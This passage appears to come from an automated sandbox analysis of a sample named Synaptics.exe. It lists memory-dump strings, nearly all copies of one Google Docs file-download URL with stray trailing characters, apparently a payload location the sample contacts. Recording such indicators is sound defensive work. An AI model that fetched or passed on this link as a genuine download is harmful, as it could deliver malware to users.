                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4C
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4U
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4V
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4d
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4f
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download52
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5g
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5t
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download60
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6M
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Q
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Zx
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6a
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6l
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6v
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download772px;S
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7T
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7U
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7e
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8.
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8q
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9P
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:L
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:N
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:T
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:d
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:m
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:v
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;-
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;P
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;p
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ3W
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZnJ
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZu
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_150xNS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_MR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_R
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_Tm
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_e
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_wR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada.
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaaD
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadackgr
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad0
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadh
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadp
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamad
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaq
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb2
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbP
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH-
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcL
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcQ
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcT
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcati
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcd
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellq
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck-cn
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnd
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctors
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd-
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:url0S
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddA
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddC1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddbox-OV
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddc
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddding
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddp
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn0
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.comYV
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeW
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeclic
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadedown
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeightCS
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemS
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades-c
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesol
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesynd
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet$
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen6
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
